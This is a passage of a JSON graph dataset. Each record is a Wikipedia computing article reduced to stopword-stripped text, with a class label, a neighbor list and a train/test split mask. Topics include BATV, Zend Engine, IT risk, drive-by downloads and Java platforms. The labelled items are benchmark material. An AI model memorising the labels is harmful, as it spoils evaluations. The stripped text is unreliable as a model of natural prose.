    "text": "Bounce_Address_Tag_Validation:bounce address tag validation computing bounce address tag validation batv method defined internet draft determining whether bounce address specified e-mail message valid designed reject backscatter bounce messages forged return addresses basic idea send e-mail return address includes timestamp cryptographic token forged e-mail returned bounce without valid signature rejected e-mail bounced back empty null return address bounces never created bounce therefore ca n't get messages bouncing back forth forever batv replaces envelope sender like codice_1 codice_2 codice_3 called simple private signature one possible tagging schemes actually one fully specified draft batv draft gives framework possible techniques fit types implementations using public key signatures verified third parties mentioned left undefined overall framework vague/flexible enough similar systems sender rewriting scheme fit framework sami farin proposed anti-bogus bounce system 2003 news.admin.net-abuse.email used basic idea putting hard forge hash message bounce address late 2004 goodman et al proposed much complex signed envelope sender included hash message body intended address wide variety forgery threats including bounces forged mail several months later levine crocker proposed batv current name close current form draft anticipates problems running batv also problems prevent batv systems eliminating backscatter",
    "neighbors": [
      8337,
      9588,
      6261,
      3350,
      9909,
      10906,
      6492,
      3645,
      2527
    ],
    "mask": "Test"
  },
  {
    "node_id": 3550,
    "label": 2,
    "text": "XSplash:xsplash xsplash software project ubuntu community uses x window system replace scrolling-text screens appear booting linux-based computer graphical splash screen xsplash replaced usplash uses linux framebuffer ubuntu 9.10 karmic koala bringing ubuntu closer goal 10-second boot time ubuntu 10.04 lts lucid lynx improved boot performance usplash boot systems achieved prioritizing startup processes related x server using single x server throughout boot process",
    "neighbors": [
      11669,
      3478,
      8476,
      926,
      5410,
      3245,
      6445,
      7983,
      8112,
      439,
      823,
      10687,
      3654,
      5962,
      975,
      7375,
      1107,
      4951,
      3033,
      5343,
      4192,
      6625,
      7140,
      5990,
      7913,
      7020,
      9324,
      8177,
      2930,
      9971,
      1396,
      3189,
      5369,
      5755,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 3551,
    "label": 2,
    "text": "Michael_J._Karels:michael j. karels michael j mike karels american software engineer one key people history bsd unix graduate university notre dame bachelor science microbiology mike went university california berkeley advanced degree microbiology mike access department computer since administrator pdp-11 enough time mike started helping making changes system mike started contribution unix 2.9bsd release distributed pdp-11 mike saw job posting computer systems research group bsd project decided jump 1982 mike took bill joy responsibilities mr. joy left csrg system architect 4.3bsd important bsd release base development number commercial unix flavors available today including solaris release introduced world deep detail all-time famous book design implementation 4.3bsd unix operating system black cover smiling beastie mike csrg principal programmer 8 years mike worked closely van jacobson number widely accepted algorithms tcp implementation including jacobson/karels algorithm tcp slow start routing radix tree probably famous ones mike spends little time taking credit work hand uses every opportunity mention names people one way role contribution tcp/ip implementation unix 1993 usenix association gave lifetime achievement award flame computer systems research group university california berkeley honoring 180 individuals including karels contributed csrg 4.4bsd-lite release later mike moved bsdi berkeley software design designed bsd/os years commercially available bsd style unix intel platform bsd/os reliable os platform designed internet services bsdi software asset bought wind river april 2001 mike joined wind river principal technologist bsd/os platform 2009 mike sr principal engineer mcafee 2015 worked intel later forcepoint llc",
    "neighbors": [
      7552,
      5506,
      6787,
      1541,
      1927,
      4745,
      7561,
      5771,
      10761,
      2061,
      9743,
      274,
      9747,
      8725,
      9625,
      1946,
      4636,
      5534,
      1316,
      2212,
      10535,
      684,
      4908,
      1839,
      11698,
      11573,
      1718,
      8631,
      1080,
      5177,
      5819,
      9151,
      704,
      9153,
      3651,
      7748,
      10436,
      11459,
      2887,
      9927,
      8266,
      8395,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      10202,
      607,
      8671,
      7521,
      1891,
      998,
      9320,
      873,
      4073,
      7017,
      9452,
      633,
      3058,
      7027,
      9201,
      2421,
      9844,
      2424,
      1273,
      8316,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 3552,
    "label": 4,
    "text": "IT_risk:risk information technology risk risk it-related risk cyber risk risk related information technology information long appreciated valuable important asset rise knowledge economy digital revolution led organizations becoming increasingly dependent information information processing especially various events incidents compromise way therefore cause adverse impacts organization business processes mission ranging inconsequential catastrophic scale assessing probability likelihood various types event/incident predicted impacts consequences occur common way assess measure risks alternative methods measuring risk typically involve assessing contributory factors threats vulnerabilities exposures asset values risk potential given threat exploit vulnerabilities asset group assets thereby cause harm organization measured terms combination probability occurrence event consequence committee national security systems united states america defined risk different documents national information assurance training education center defines risk field many nist publications define risk context different publications fismapedia term provide list nist sp 800-30 defines risk probable frequency probable magnitude future loss isaca published risk framework order provide end-to-end comprehensive view risks related use risk defined according risk risk broader meaning encompasses negative impact operations service delivery bring destruction reduction value organization also benefit\\value enabling risk associated missing opportunities use technology enable enhance business project management aspects like overspending late delivery adverse business impact measuring risk cyber risk occur many levels business level risks managed categorically front line departments noc tend measure discreet individual risks managing nexus key role modern ciso measuring risk kind selecting correct equation given threat asset available data important step subject unto common components risk equations helpful understand four fundamental forces involved risk management also apply cybersecurity assets impact threats likelihood internal knowledge fair amount control assets tangible intangible things value also control impact refers loss damage asset however threats represent adversaries methods attack external control likelihood wild card bunch likelihoods determine threat materialize succeed damage never fully control likelihoods shaped influenced manage risk mathematically forces represented formula formula_1 p likelihood threat materialize/succeed asset likelihood various levels damage may occur field risk management spawned number terms techniques unique industry industry terms yet reconciled example term vulnerability often used interchangeably likelihood occurrence problematic often encountered risk management terms techniques include risk r product likelihood l security incident occurring times impact incurred organization due incident likelihood security incident occurrence function likelihood threat appears likelihood threat successfully exploit relevant system vulnerabilities consequence occurrence security incident function likely impact incident organization result harm organization assets sustain harm related value assets organization asset different values different organizations r function four factors numerical values money impact probabilities factors risk expressed monetary terms compared cost countermeasures residual risk applying security control always practical express values first step risk evaluation risk graded dimensionless three five steps scales owasp proposes practical risk measurement guideline based nist cybersecurity framework encourages organizations manage risk part identify id function risk assessment id.ra organization understands cybersecurity risk organizational operations including mission functions image reputation organizational assets individuals risk management strategy id.rm organization ’ priorities constraints risk tolerances assumptions established used support operational risk decisions following brief description applicable rules organized source oecd issued following european union issued following divided topic united states issued following divided topic list chiefly based",
    "neighbors": [
      3969,
      5636,
      5002,
      7436,
      7692,
      2190,
      399,
      8975,
      3473,
      4755,
      5780,
      278,
      8471,
      1567,
      10915,
      7979,
      1709,
      11567,
      433,
      3125,
      7228,
      1088,
      10437,
      1479,
      4936,
      8904,
      11594,
      5325,
      9293,
      4689,
      4948,
      9688,
      1369,
      7898,
      11609,
      4956,
      10717,
      11611,
      612,
      999,
      7528,
      3447,
      10106,
      4348,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3553,
    "label": 9,
    "text": "Zend_Engine:zend engine zend engine open source scripting engine interprets php programming language originally developed andi gutmans zeev suraski students technion – israel institute technology later founded company called zend technologies ramat gan israel name zend combination forenames zeev andi first version zend engine appeared 1999 php version 4 written c highly optimized modular back-end first time could used applications outside php zend engine provides memory resource management standard services php language performance reliability extensibility played significant role php increasing popularity followed zend engine ii heart php 5 newest version zend engine iii originally codenamed phpng developed php 7 significantly improves performance source code zend engine freely available zend engine license although parts php license since 2001 part official releases php.net well official git repository github mirror various volunteers contribute php/zend engine codebase zend engine used internally php compiler runtime engine php scripts loaded memory compiled zend opcodes opcodes executed html generated sent client implement web script interpreter need three parts zend takes part 1 completely bit part 2 php takes parts 2 3 zend really forms language core implementing php basics predefined functions",
    "neighbors": [
      4485,
      1034,
      6154,
      9614,
      4112,
      3986,
      10013,
      1952,
      2465,
      5154,
      8609,
      7462,
      2348,
      814,
      190,
      6338,
      2372,
      3012,
      8644,
      1353,
      4171,
      6477,
      10703,
      3413,
      7293,
      11221,
      9432,
      7421,
      10075,
      10587,
      11357,
      8037,
      7785,
      7147,
      9714,
      4853,
      2808,
      11259,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3554,
    "label": 9,
    "text": "Abstract_syntax:abstract syntax computer science abstract syntax data structure described data type possibly necessarily abstract data type independent particular representation encoding particularly used representation text computer languages generally stored tree structure abstract syntax tree abstract syntax consists structure data contrasted concrete syntax also includes information representation example concrete syntax includes features like parentheses grouping commas lists included abstract syntax implicit structure abstract syntaxes classified first-order abstract syntax foas structure abstract names identifiers still concrete thus requires name resolution higher-order abstract syntax names abstract implemented either computation communications mapping abstract syntax specific machine representations encodings must defined may called concrete syntax language implementation transfer syntax communications compiler internal representation program typically specified abstract syntax terms categories statement expression identifier independent source syntax concrete syntax language compiled though often similar parse tree similar abstract syntax tree typically also contain features parentheses syntactically significant implicit structure abstract syntax tree algebraic data types particularly well-suited implementation abstract syntax",
    "neighbors": [
      1952,
      10145,
      10560,
      8262,
      5213,
      8221
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3555,
    "label": 4,
    "text": "Drive-by_download:drive-by download drive-by download means two things concerning unintended download computer software internet drive-by downloads may happen visiting website opening e-mail attachment clicking link clicking deceptive pop-up window clicking window mistaken belief example error report computer operating system acknowledged seemingly innocuous advertisement pop-up dismissed cases supplier may claim user consented download although user fact unaware started unwanted malicious software download similarly person visiting site malicious content person may become victim drive-by download attack malicious content may able exploit vulnerabilities browser plugins run malicious code without user ’ knowledge drive-by install installation similar event refers installation rather download though sometimes two terms used interchangeably creating drive-by download attacker must first create malicious content perform attack rise exploit packs contain vulnerabilities needed carry drive-by download attacks skill level needed perform attack reduced next step host malicious content attacker wishes distribute one option attacker host malicious content server however difficulty directing users new page may also hosted compromised legitimate website legitimate website unknowingly distributing attackers content third party service e.g advertisement content loaded client attacker analyze fingerprint client order tailor code exploit vulnerabilities specific client finally attacker exploits necessary vulnerabilities launch drive-by download attack drive-by downloads usually use one two strategies first strategy exploiting api calls various plugins example downloadandinstall api sina activex component properly check parameters allowed downloading execution arbitrary files internet second strategy involves writing shellcode memory exploiting vulnerabilities web browser plugin divert control flow program shell code shellcode executed attacker perform malicious activities often involves downloading installing malware anything including stealing information send back attacker attacker may also take measures prevent detection throughout attack one method rely obfuscation malicious code done use iframes another method encrypt malicious code prevent detection generally attacker encrypts malicious code ciphertext includes decryption method ciphertext detection drive-by download attacks active area research methods detection involve anomaly detection tracks state changes user ’ computer system user visits webpage involves monitoring user ’ computer system anomalous changes web page rendered methods detection include detecting malicious code shellcode written memory attacker ’ exploit another detection method make run-time environments allow javascript code run track behavior runs detection methods include examining contents html pages identify features used identify malicious web pages using characteristics web servers determine page malicious antivirus tools use static signatures match patterns malicious scripts although effective obfuscation techniques detection also possible using low-interaction high-interaction honeyclients drive-by downloads also prevented occurring using script-blockers noscript easily added browsers firefox using script-blocker user disable scripts given webpage selectively re-enable individual scripts one-by-one basis order determine ones truly necessary webpage functionality way whitelist acceptable scripts quickly developed turn facilitates convenient safe efficient browsing websites script-blocking also saves time bandwidth hence money user scripts load advertising especially targeted ads invade user privacy via tracking profiling longer constitute personal drain user his/her resources",
    "neighbors": [
      5636,
      3462,
      7304,
      5131,
      4883,
      6550,
      4503,
      10392,
      3996,
      5536,
      3620,
      2213,
      7717,
      10026,
      4275,
      11319,
      10297,
      7098,
      7739,
      6588,
      1088,
      11330,
      4165,
      3786,
      11213,
      4309,
      5082,
      858,
      988,
      7515,
      5986,
      8171,
      4718,
      10872,
      507,
      5886
    ],
    "mask": "None"
  },
  {
    "node_id": 3556,
    "label": 1,
    "text": "Query_by_Example:query example query example qbe database query language relational databases devised moshé m. zloof ibm research mid-1970s parallel development sql first graphical query language using visual tables user would enter commands example elements conditions many graphical front-ends databases use ideas qbe today originally limited purpose retrieving data qbe later extended allow operations inserts deletes updates well creation temporary tables motivation behind qbe parser convert user actions statements expressed database manipulation language sql behind scenes statement actually executed suitably comprehensive front-end minimize burden user remember finer details sql easier productive end-users even programmers select tables columns selecting rather typing names context information retrieval qbe somewhat different meaning user submit document several documents ask similar documents retrieved document database see search multiple examples similarity search based comparing document vectors see vector space model qbe seminal work end-user development frequently cited research papers early example topic currently qbe supported several relational database front ends notably microsoft access implements visual query example well microsoft sql server enterprise manager also implemented several object-oriented databases e.g db4o qbe based logical formalism called tableau query although qbe adds extensions much like sql based relational algebra example using suppliers parts database given illustrate qbe works term also refers general technique influenced zloof work whereby items search values used filter results provides way software user perform queries without know query language sql software automatically generate queries user usually behind scenes examples example form b resulting sql note blank items generate sql terms since address blank clause generated example form c resulting sql advanced versions qbe comparison operator options often via pull-down menu contains contains starts greater-than forth another approach text comparisons allow one wildcard character characters example asterisk designated wild wildcard character particular system searching last names using rob* would return match last names rob robert robertson roberto etc",
    "neighbors": [
      4065,
      261,
      4614,
      9286,
      10342,
      8201,
      10413,
      10286,
      10899,
      2901,
      5983,
      6101,
      987,
      4255
    ],
    "mask": "Train"
  },
  {
    "node_id": 3557,
    "label": 9,
    "text": "MAI_Basic_Four:mai basic four mai basic four sometimes written basic/four corporation basic 4 refers variety business basic computers ran company sold name various times given mai basic four inc. mai basic four information systems mai systems corporation mai systems corporation became wholly owned subsidiary softbrands inc. 2006 basic/four corporation created subsidiary management assistance inc. irvine california basic/four sold small business minicomputers assembled microdata corporation cpus mai basic four business basic one first commercially available business basic interpreters mai basic four company originally sold minicomputers later offered superminicomputers microcomputers computers ran operating system basic interpreter integrated 1985 wall street financier bennett s. lebow purchased company experienced significant operating financial losses 1988 lebow used company platform unsuccessful attempted hostile takeover much larger prime computer company released accounting software third-party microcomputers mid 1980 1988 released 80286-based workstation basic4 system utilized many small banks credit unions 1990 company changed name mai systems corp. changed business system integrator instead combined hardware software manufacturer reselling third-party computers installing customer-specific software system",
    "neighbors": [
      2179,
      10692
    ],
    "mask": "Test"
  },
  {
    "node_id": 3558,
    "label": 9,
    "text": "Java_Message_Service:java message service java message service jms api java message-oriented middleware api sending messages two clients implementation handle producer–consumer problem jms part java platform enterprise edition java ee defined specification developed sun microsystems since guided java community process messaging standard allows application components based java ee create send receive read messages allows communication different components distributed application loosely coupled reliable asynchronous messaging form loosely coupled distributed communication context term 'communication understood exchange messages software components message-oriented technologies attempt relax tightly coupled communication tcp network sockets corba rmi introduction intermediary component approach allows software components communicate indirectly benefits include message senders needing precise knowledge receivers advantages messaging include ability integrate heterogeneous platforms reduce system bottlenecks increase scalability respond quickly change jms 2.0 currently maintained java community process jsr 343 following jms elements jms api supports two distinct models point-to-point messaging system messages routed individual consumers maintain queues incoming messages messaging type built concept message queues senders receivers message addressed specific queue receiving clients extract messages queues established hold messages number producers send messages queue message guaranteed delivered consumed one consumer queues retain messages sent messages consumed messages expire consumers registered consume messages queue holds consumer registers consume publish-and-subscribe model supports publishing messages particular message topic subscribers may register interest receiving messages published particular message topic model neither publisher subscriber knows good analogy anonymous bulletin board jms provides way separating application transport layer providing data java classes used communicate different jms providers using java naming directory interface jndi information desired provider classes first use connection factory connect queue topic use populate send publish messages receiving side clients receive subscribe messages rfc 6167 defines codice_1 uri scheme java message service use jms one must jms provider manage sessions queues topics starting java ee version 1.4 jms provider contained java ee application servers implemented using message inflow management java ee connector architecture first made available version following list common jms providers",
    "neighbors": [
      1280,
      9988,
      4233,
      4490,
      4107,
      9225,
      3341,
      1047,
      10526,
      11038,
      9124,
      5029,
      10020,
      10924,
      5677,
      6067,
      10553,
      2106,
      3517,
      3518,
      3519,
      3008,
      6334,
      9665,
      4419,
      11582,
      1095,
      11339,
      3278,
      3920,
      211,
      1363,
      6483,
      1628,
      4959,
      4960,
      1250,
      1128,
      3560,
      8425,
      9834,
      3954,
      3573,
      10486,
      1657,
      2556,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 3559,
    "label": 4,
    "text": "Diane_Beckman:diane beckman brigadier general m. diane beckman usaf fictional character nbc television series chuck beckman senior official national security agency working within office director national intelligence holds rank brigadier general united states air force revealed spent significant amount time resources hunting orion intersect chief designer re-appeared made deal government little information personal life past service revealed first entered military prior august 14 1974 fought two battles gulf war non-exclusive romantic relationship roan montgomery 20 years see personality beckman also maintains close friendship dr. condoleezza rice general beckman first appeared chuck versus helicopter replacing national intelligence director wendy makkena overseer operation bartowski initially casey sarah protect chuck replacement intersect back online sarah chuck believed occurred chuck would free go back normal life however beckman secretly issued orders casey chuck killed prevent government secrets retained falling wrong hands however destruction second intersect order rescinded additionally operation bartowski effective weapon cia splinter group fulcrum beckman decided chuck far important valuable resource released therefore blocked attempts contact orion intersect removed beckman also made clear chuck ever identified taken protective custody beckman primary role series provide team bartowski intelligence updates chuck flashes assign mission objectives time missions result something chuck flashes course normal day however several occasions beckman issued assignment devising based events elsewhere chuck abilities intersect particularly well-suited beckman seldom personally involved assignments allows team proceed however chuck versus crown vic benched team flash chuck went bad ordered casey locked personal vendetta former mentor botched mission beckman personally involved chuck contacted orion rogue search flew burbank debrief team first time since pilot episode one team supervisors met in-person also first time directly involved episode mission general beckman typically declines interfere directly team dynamics however sarah confrontational attitude towards treatment chuck chuck versus predator led concern sarah emotionally close asset casey attempted cover requested provide unedited report chuck sarah relationship led reassigning cia agent alexandra forrest chuck cia handler directive 49-b forrest subsequently failed protect chuck lacked sarah close personal connection understanding beckman forced acknowledge sarah feelings asset made best choice protect chuck failed operation locate father allowed jill escape beckman decided pull plug operation bartowski ordered casey sarah take chuck permanent custody reversed decision intersect removed chuck head chuck versus colonel chuck versus ring offered chuck analyst position intersect project freed casey return old unit reassigned sarah intersect project bryce larkin rounding beckman interference team ordered sarah apprehend casey upon learning stolen valuable item cia facility casey broken came castle ordered sarah chuck capture dead alive despite three agents eventually working together taking ring cell coerced stealing cia first place beckman could brook casey treason dismissed spot beckman also wished discuss sarah transferring burbank chuck needed less less beckman look lightly three years untold millions dollars spent helping chuck reach potential become understanding chuck hand-wringing second-guessing part process beckman insists seeing video recovered ring knowledge sarah killed shaw wife season 3 finale beckman higher ups cia concerned state operation bartowski chuck particular gets swept away setup staged much alive shaw purpose discredit could take place spies convention five elders ring going take nsa cia team bartowski arrests elders along daniel shaw justin sullivan leading disintegration ring chuck later reveals ellie beckman reinstated allowed resign spy world season 4 premier federal government rebuilt burbank buy secret joint nsa/cia station staffed undercover spies beckman initially installs on-site guise buy manager using big mike old office displaying real forename middle name diane name tag although incongruously prefers personnel continue address general even undercover store withdrawn approval chuck resignation systematically eliminates private sector job opportunities order force return cia buy new improvements buy include trap door drops reluctant chuck bespin-esque tube slide castle rehiring morgan grimes green shirter salesman upstairs operative downstairs beckman reluctantly concedes observation buy undercover staff far efficient pleasant rendering cover virtually transparent accordingly authorizes morgan rehire store former staff appoints store manager stead general beckman series regular character based san fernando valley usually seen video conferences office still on-site management buy reconstruction time shown away fort meade desk field two consecutive episodes supervising arrest alexei volkoff bartowski family forest cabin subsequently participating capture fatima tazi rescue roan montgomery marrakesh morocco latter case called air strike tazi counterfeiting presses personally employed rocket-propelled grenade disable tazi prevent montgomery execution noticeably general dresses usual service uniform even field subordinate military personnel fatigue uniform also occasionally visits team bartowski burbank particularly season 4 although position prevents openly beckman ultimately proves loyalty team chuck versus cliffhanger chuck casey burned clyde decker attempt free alexei volkoff save sarah life beckman provides information volkoff taken identity card enter castle also supposedly left chuck pair sunglasses intent restoring intersect suppressed decker however accidentally put morgan first however noticeably absent chuck sarah wedding end season 4 government concluded operation bartowski stripped castle equipment sold buy more/castle complex concurrently beckman terminated civil service employment chuck sarah morgan although three employed cia nsa arranged either retirement second dismissal casey marine corps beckman involvement chuck intersect project appeared concluded intersect-embedded sunglasses meant chuck addressed gift beckman chuck versus frosted tips beckman came chuck hire carmichael industries help capture man named zorn prevent selling cia secrets later sarah calls beckman regarding intersect glasses learn never sent glasses implied clyde decker responsible end episode beckman clandestinely meets chuck warning since morgan outed intersect decker put kill order subsequently morgan hidden castle beckman arrived remove intersect going call kill order unfortunately one assassins called decker announced viper team bartowski catches viper beckman decker tell hit chuck versus curse beckman calls team officially condemn treason death decker stealing omen virus tapping morse code team flee later rendezvoused casey abandoned bar well sending agent escort woodcombs unfortunately woodcombs assumed beckman agent hostile fled captured rogue agent robyn cunnings chuck brashly gives virus save family casey sarah able arrest cunnings afterwards casey beckman interrogated cunnings threatening use torture device confirming conspiracy cia team bartowski cleared charge treason well casey criminal record however cunnings already released omen virus turn released shaw mastermind behind decker team rogue actions shaw holding sarah hostage beckman forced help chuck infiltrate cia retrieve macau device decker office mission forced kiss chuck dressed santa throw suspicions soon shaw defeated suppressed ring intersect beckman agrees use government funds help team enjoy christmas team bartowski ultimately one last enemy named nicholas quinn ex-cia agent supposed receive original intersect kidnapped sarah uploaded infected intersect morgan brainwashed bidding beckman tried best help team quinn escaped intersect glasses however could use intersect without damaging brain sought pieces key device could alter intersect beckman unaware held piece unexpectedly taken hostage attending concert chinese counterpart quinn placed bomb beneath seat set go music ended luckily jeff lester able delay explosion chuck forced upload perfected intersect save beckman beckman commended former team work offered employ wish beckman portrayed stern woman little tolerance confrontation subordinates abrupt point shows little interest chuck life beyond service intersect beckman frequently overrules chuck sarah objections placing situations put danger compromise personal life ethics firmly believes war fulcrum must use whatever weapons arsenal defeat operation bartowski successful asset fight refuses allow chuck intersect removed demands become spy beckman wryness led actress bonita friedericy name chuckles beckman frequently lies withholds information members team bartowski mostly chuck interest national security beta intersect completed graham released chuck obligations cia nsa immediately ordered casey eliminate order hinted several times first season beckman lied often subject orion solely purpose keeping intersect chuck head forcing become spy later ordered sarah betray chuck chuck could taken underground rescinded chuck resignation end season 3 despite chuck saving life career operation bartowski declared unmitigated success beckman sabotages attempts chuck made gain employment outside cia declaring chuck says later insists chuck sister ellie woodcomb involuntarily used provide government intel intersect orion laptop seems configured allow access program objections team little shown general personal life known friends dr. condoleezza rice beckman one two concurrent nbc fictional characters jack donaghy 30 rock friends former secretary state first episode explore beckman past relationships detail season four episode chuck versus seduction impossible episode confirmed roan montgomery john laroquette maintained ongoing romantic relationship sorts twenty years enjoying periodic rendezvous fall berlin wall pair engaged tryst promised retire 2009 survived subsequently angered montgomery went rogue operation rather meet promised although ongoing committed relationship per se although montgomery professional expertise seduction honey traps beckman entirely conceal jealousy resentment diane admitted intended cancel plans retire recognizing involved work comfortable settling normal life beckman montgomery tracked n't run general montgomery ncs director jane bentley mary bartowski among characters diane comfortable addressing forename beckman puts strongly professional attitude dealing team rarely shows signs emotion caught off-guard chuck announcement orion identified contacted also humorous effect flustered montgomery charms aided team recovering cipher asked chuck life outside nsa reassured casey objected question n't bothered admitted n't uniform chuck versus angel de la muerte first time shown uniform interrupted cocktail party beckman also highly driven tenacious tracked orion years shows wounded pride shock chuck succeeded finding weeks deeply angered chuck insistence freed intersect taken fight fulcrum personally due increasing number men women sent deaths trying defeat sees chuck team group found chink armor outcome going rest squarely chuck shoulders although generally unflappable beckman openly upset pleaded daniel shaw allowed disclose full details team recently completed mission carina chuck versus three words despite professionalism front subordinates also times displayed genuine sympathy concern well-being team visibly concerned realization shaw knowledge sarah killing wife placed sarah danger beckman known reader ayn rand strict professional beckman officially approve chuck sarah beginning romantic relationship however record even acknowledged damn time beckman openly admitted caring chuck chuck versus tooth became apparent intersect taking devastating effect chuck mental state like col. casey bg beckman begrudgingly grown appreciate morgan grimes unusual talents importance keeping intersect i.e. chuck mind functioning properly although initially hired duress condition casey delivery ring director demanded involuntary reinstatement resignation months later almost immediately appointed manager buy recognition knowledge understanding keep cover store appearance genuine morgan regular character shown address forename diane captain although corrected time response displeasure close-ups ms. friedericy costume available infobox several ribbons sequence shown order worn character example kuwait liberation medals saudi arabia kuwait foreign awards follow united states awards precede gwotem gwotsm two stars southwest asia service medal show served two five distinct campaigns gulf war general beckman three awards national defense service medal evidence first entered military prior august 14 1974 three recent periods service medal issued vietnam war january 1 1961 august 14 1974 gulf war august 2 1990 november 30 1995 war terrorism september 11 2001 chuck versus intersect actress wendy makkena appeared role credited national intelligence director casting lists character identified general mary beckman episode intelligence director briefed casey alongside director graham intersect theft dispatching burbank track bryce larkin contact makkena continue appearing role however forced drop unspecified reasons pilot filmed bonita friedericy also auditioned role took makkena left although intelligence director name never used pilot schwartz fedak officially confirmed friedericy suggested two characters general beckman id card reads gen. m. beckman shown chuck chart first seen second-season episode chuck versus lethal weapon matches unofficial name makkena character pilot compounded original pilot script general mary beckman seen speaking director graham video conference screen shown immediately conferences beckman displays large seal essentially u.s coat arms crest replaced globe ringed satellites around words office director national intelligence united states america also suggesting characters",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 3560,
    "label": 9,
    "text": "Java_Platform,_Enterprise_Edition:java platform enterprise edition java enterprise edition java ee formerly java 2 platform enterprise edition j2ee currently jakarta ee set specifications extending java se 8 specifications enterprise features distributed computing web services java ee applications run reference runtimes microservices application servers handle transactions security scalability concurrency management components deploying java ee defined specification specification defines apis application programming interface interactions java community process specifications providers must meet certain conformance requirements order declare products java ee compliant examples contexts java ee referencing runtimes used e-commerce accounting banking information systems platform known java 2 platform enterprise edition j2ee version 1.2 name changed java platform enterprise edition java ee version 1.5 current version called java ee 8 java ee maintained oracle java community process september 12 2017 oracle corporation announced would submit java ee eclipse foundation eclipse top-level project named eclipse enterprise java ee4j eclipse foundation forced change name java ee oracle owns trademark name java february 26 2018 announced new name java ee jakarta ee java ee includes several specifications serve different purposes like generating web pages reading writing database transactional way managing distributed queues java ee apis include several technologies extend functionality base java se apis enterprise javabeans connectors servlets javaserver pages several web service technologies attempt limit footprint web containers physical conceptual terms web profile created subset java ee specifications java ee web profile comprises following although definition java ee implementations provide base level technologies namely java ee spec associated apis differ considerably respect extra features like connectors clustering fault tolerance high availability security etc installed size memory footprint startup time etc code sample shown demonstrates various technologies java ee 7 used together build web form editing user java ee web ui built using servlet javaserver pages jsp javaserver faces jsf facelets example uses jsf facelets explicitly shown input components use java ee bean validation api covers validate constraints assist view java ee uses concept called backing bean example uses contexts dependency injection cdi enterprise javabean ejb implement business logic enterprise javabean ejb dedicated technology java ee actual persistence jdbc java persistence api jpa used example uses ejb jpa explicitly shown jta used covers ejb control transactional behavior defining entity/model classes java ee provides java persistence api jpa expressing constraints entities provides bean validation api example uses technologies",
    "neighbors": [
      7176,
      4107,
      5658,
      5677,
      2106,
      572,
      7750,
      1095,
      5210,
      1128,
      9834,
      11375,
      1136,
      8825,
      3705,
      4222,
      3712,
      6277,
      4233,
      8355,
      2737,
      6334,
      6338,
      8900,
      6860,
      3278,
      8913,
      9441,
      1250,
      9455,
      5872,
      7930,
      3323,
      9988,
      4358,
      3341,
      5910,
      7446,
      10526,
      8994,
      10020,
      1836,
      9011,
      9012,
      7485,
      11582,
      3920,
      1363,
      4959,
      4960,
      5987,
      3954,
      9078,
      3966,
      910,
      1447,
      5031,
      9137,
      6067,
      6074,
      10683,
      10684,
      3517,
      3518,
      3519,
      3008,
      5567,
      9665,
      10193,
      3545,
      11237,
      3558,
      3561,
      3562,
      7146,
      6636,
      4604,
      2558,
      6143
    ],
    "mask": "Train"
  },
  {
    "node_id": 3561,
    "label": 9,
    "text": "Java_Platform,_Micro_Edition:java platform micro edition java platform micro edition java computing platform development deployment portable code embedded mobile devices micro-controllers sensors gateways mobile phones personal digital assistants tv set-top boxes printers java formerly known java 2 platform micro edition j2me platform uses object-oriented java programming language part java software-platform family java designed sun microsystems acquired oracle corporation 2010 platform replaced similar technology personaljava originally developed java community process jsr 68 different flavors java evolved separate jsrs oracle provides reference implementation specification tended provide free binary implementations java runtime environment mobile devices rather relying third parties provide 22 december 2006 java source code licensed gnu general public license released project name phoneme 2008 java platforms currently restricted jre 1.3 features use version class file format internally known version 47.0 oracle ever declare new round java configuration versions support later class file formats language features corresponding jre 1.5 1.6 notably generics entail extra work part platform vendors update jres java devices implement profile common mobile information device profile aimed mobile devices cell phones personal profile aimed consumer products embedded devices like set-top boxes pdas profiles subsets configurations currently two connected limited device configuration cldc connected device configuration cdc 2.1 billion java enabled mobile phones pdas popular sub- 200 devices nokia series 40 also used bada operating system symbian os along native software users windows ce windows mobile maemo meego android download java respective environments proof-of-concept android connected limited device configuration cldc contains strict subset java-class libraries minimum amount needed java virtual machine operate cldc basically used classifying myriad devices fixed configuration configuration provides basic set libraries virtual-machine features must present implementation j2me environment coupled one profiles connected limited device configuration gives developers solid java platform creating applications consumer embedded devices configuration designed devices 160kb 512kb total memory minimum 160kb rom 32kb ram available java platform designed mobile phones mobile information device profile includes gui data storage api midp 2.0 includes basic 2d gaming api applications written profile called midlets almost new cell phones come midp implementation de facto standard downloadable cell phone games however many cellphones run midlets approved carrier especially north america jsr 271 mobile information device profile 3 final release 09 dec 2009 specified 3rd generation mobile information device profile midp3 expanding upon functionality areas well improving interoperability across devices key design goal midp3 backward compatibility midp2 content information module profile imp profile embedded headless devices vending machines industrial embedded applications security systems similar devices either simple display limited network connectivity originally introduced siemens mobile nokia jsr-195 imp 1.0 strict subset midp 1.0 except n't include user interface apis — words n't include support java package codice_1 jsr-228 also known imp-ng imp next generation based midp 2.0 leveraging midp 2.0 new security networking types apis apis codice_2 codice_3 n't include ui apis game api connected device configuration subset java se containing almost libraries gui related richer cldc foundation profile java connected device configuration cdc profile profile intended used devices requiring complete implementation java virtual machine including entire java platform standard edition api typical implementations use subset api set depending additional profiles supported specification developed java community process personal basis profile extends foundation profile include lightweight gui support form awt subset platform bd-j built upon sun provides reference implementation configurations profiles midp cdc starting javame 3.0 sdk netbeans-based ide support single ide contrast numerous binary implementations java platform built sun servers workstations sun provide binaries platforms java targets exception midp 1.0 jre jvm palm os sun provides j2me jre microsoft windows mobile pocket pc based devices despite open-letter campaign sun release rumored internal implementation personaljava known code name captain america third party implementations widely used windows mobile vendors operating systems targeting java implemented docomo form doja savaje savaje os latter company purchased sun april 2007 forms basis sun javafx mobile open-source mika vm aims implement javame cdc/fp certified certified implementations required charge royalties impractical open-source project consequently devices use implementation allowed claim javame cdc compatibility linux-based android operating system uses proprietary version java similar identical java esr consortium devoted standards embedded java especially cost effective standards typical applications domains industrial control machine-to-machine medical e-metering home automation consumer human-to-machine-interface ...",
    "neighbors": [
      11271,
      7176,
      3626,
      5677,
      7727,
      1083,
      572,
      7750,
      9292,
      7246,
      7253,
      3162,
      6748,
      607,
      2658,
      6763,
      1136,
      11380,
      8825,
      3705,
      8315,
